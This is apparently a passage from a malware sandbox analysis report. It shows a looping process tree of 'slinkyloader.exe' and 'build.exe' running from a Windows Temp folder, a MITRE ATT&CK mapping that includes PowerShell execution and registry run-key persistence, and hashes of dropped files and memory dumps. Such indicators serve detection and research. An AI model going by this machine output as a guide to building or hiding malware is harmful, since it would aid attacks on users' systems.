        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        47⤵
        
        PID:10676
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        48⤵
        
        PID:10932
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        48⤵
        
        PID:10976
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        49⤵
        
        PID:11216
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        49⤵
        
        PID:11260
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        50⤵
        
        PID:6316
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        50⤵
        
        PID:10624
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        51⤵
        
        PID:6492
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        51⤵
        
        PID:8556
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        52⤵
        
        PID:2952
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        52⤵
        
        PID:9484
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        53⤵
        
        PID:7144
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        54⤵
        
        PID:7136
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        53⤵
        
        PID:8556
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        54⤵
        
        PID:7296
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        54⤵
        
        PID:11296
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        55⤵
        
        PID:11576
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        55⤵
        
        PID:11604
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        56⤵
        
        PID:11908
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        56⤵
        
        PID:11964
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        57⤵
        
        PID:12212
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        57⤵
        
        PID:12248
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        58⤵
        
        PID:11324
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        58⤵
        
        PID:7924
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        59⤵
        
        PID:11996
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        59⤵
        
        PID:12036
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        60⤵
        
        PID:3744
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        60⤵
        
        PID:11200
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        61⤵
        
        PID:7412
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        61⤵
        
        PID:11872
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        62⤵
        
        PID:11816
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        63⤵
        
        PID:10760
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        62⤵
        
        PID:6836
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        63⤵
        
        PID:12260
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        64⤵
        
        PID:12248
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        63⤵
        
        PID:10816
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        64⤵
        
        PID:12416
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        64⤵
        
        PID:12496
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        65⤵
        
        PID:12588
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        65⤵
        
        PID:12624
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        66⤵
        
        PID:12740
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        66⤵
        
        PID:12764
        
        C:\Users\Admin\AppData\Local\Temp\build.exe
        
        "C:\Users\Admin\AppData\Local\Temp\build.exe"
        67⤵
        
        PID:12948
        
        C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe
        
        "C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe"
        67⤵
        
        PID:13024

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
7f803908e5595ac7805479ffa4f4fc41

SHA1
42e1ba3a6f437dfcdaa03d714d56e807910fe69b

SHA256
37b6b80af283174c508fcb8a5faa0854ba1ab2add391502bbd8e81c18df0ad4d

SHA512
a4aff0953c7827d879f94d9503963c04146c94fef8d4183ef1d1479a787339272db362349bdffc4f0235667a9c7daf8a962c8c641c12fd90277e0c4af8dbe04d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\slinkyloader.exe.log

Filesize
654B

MD5
2cbbb74b7da1f720b48ed31085cbd5b8

SHA1
79caa9a3ea8abe1b9c4326c3633da64a5f724964

SHA256
e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3

SHA512
ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
56c103d5888a1f6174186d5ac3a40f2a

SHA1
69ce28f18080908327d55c6ee60ca21345258306

SHA256
ec528e9ec7a09fcf9407236910e40ff20871e7552c40d3ef60bc6c9c29671ff7

SHA512
cd93cdb99433aba9d80f4dfd4bbac9ad8738c422ffa4859d4024be6b7e562b386c9334c2c4cf0816a186dd8172252a5f01031a6542238ab166449fcc03b64013

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0986400a9bb98b7eab46632deba56bd2

SHA1
52a4e89d551273e3b70ee7498d21e8811dca2423

SHA256
6e82faa015a76e79e9a294294d43730aae134d2c5112c18e1361263e92dbbec2

SHA512
58820f98f9058250400990526207d609e4836887fda0aabe594759bc2caebc5a0b5d158488dbb51b4ffaf80179304bf7e0fa65839b3c93d192e3fe8da7d7bcf1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b1b7c4dcecece0116ec946b805af8187

SHA1
c7cca224fe1b0a35d14ebb53632466dc61b8f41e

SHA256
9a41387ce2c82c23335ac9368fa317c333c4bd7e364e153a93ff170ab4315e04

SHA512
9926405274b13895f7647fd45bb0aa64d8d538350b762caeb1f4221bd0531cf2335bbd4fbe01428f61c9f6f41554c5e812360b7e0a41c1c877ce78d0930ad448

Download Submit
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Server.bat

Filesize
25.2MB

MD5
e88ea93a7f4e6c175b6899c21e6c3dba

SHA1
ba1dc929a5ece4327446c219b2b7cdb5817cc08a

SHA256
4f5eda81afd5e32493b2f6292aa0a8d44d22c30115b1e69fa3afc5edb8edf20a

SHA512
c78dc97fe7af541be356cdba6dac8cb4aac5058c5286b406b92cfed5e89cecb53a6f85f54eca062f94721aec64d594f8bedaaeb7c44063bf81468644d1a30413

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_p2vkssb4.d5f.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\build.exe

Filesize
95KB

MD5
e82e9c27abe2f4f77cb05cc4d36b6736

SHA1
e8f4cb07a0b30ffadc585b125e4ed5577fb5c082

SHA256
75cf40e9e24116604d9cf309a4d55ae038c00da24c05a2f0fe7057793cd5adcc

SHA512
e995d757b7fad0ad541010e89c3b54d872293139565d18792c2a9fa14749b934f475c3d0c5b1ff1d5fa951989d36ac3fcf06763812fafa476b9f39b5697a8c89

Download Submit
C:\Users\Admin\AppData\Local\Temp\slinkyloader.exe

Filesize
17.5MB

MD5
0e2e98f4e97316c7d6613bb10149fcf1

SHA1
dffa4e7ec86befeec114f7a7e5ceaf752e7b84f4

SHA256
bb250b5edfed1c3d0a8bac249f57ec5971b34d8435b7657bf3e57a73556ecfdd

SHA512
a232ee6ae96cf87fdc2633639474b27ac08bb691fbe690da151a761a167fffa555fd3da0a5ce7ca0b66097c5fb476890b754a8cf9527c5d8328b1550f71991a1

Download Submit
memory/1532-35-0x0000000000100000-0x0000000001292000-memory.dmp

Filesize
17.6MB

Download
memory/3628-36-0x00007FFA43390000-0x00007FFA43E52000-memory.dmp

Filesize
10.8MB

Download
memory/3628-12-0x0000023FA5D20000-0x0000023FA5D42000-memory.dmp

Filesize
136KB

Download
memory/3628-17-0x0000023FA63C0000-0x0000023FA76A4000-memory.dmp

Filesize
18.9MB

Download
memory/3628-16-0x0000023F8BD40000-0x0000023F8BD48000-memory.dmp

Filesize
32KB

Download
memory/3628-15-0x00007FFA43390000-0x00007FFA43E52000-memory.dmp

Filesize
10.8MB

Download
memory/3628-14-0x00007FFA43390000-0x00007FFA43E52000-memory.dmp

Filesize
10.8MB

Download
memory/3628-13-0x00007FFA43390000-0x00007FFA43E52000-memory.dmp

Filesize
10.8MB

Download
memory/3628-18-0x0000023FA76A0000-0x0000023FA895C000-memory.dmp

Filesize
18.7MB

Download
memory/3628-3-0x00007FFA43393000-0x00007FFA43395000-memory.dmp

Filesize
8KB

Download
memory/4804-61-0x00000000006E0000-0x00000000006FE000-memory.dmp

Filesize
120KB

Download
memory/4804-64-0x00000000052C0000-0x00000000052FC000-memory.dmp

Filesize
240KB

Download
memory/4804-65-0x0000000005330000-0x000000000537C000-memory.dmp

Filesize
304KB

Download
memory/4804-66-0x0000000005570000-0x000000000567A000-memory.dmp

Filesize
1.0MB

Download
memory/4804-63-0x0000000005260000-0x0000000005272000-memory.dmp

Filesize
72KB

Download
memory/4804-62-0x0000000005950000-0x0000000005F68000-memory.dmp

Filesize
6.1MB

Download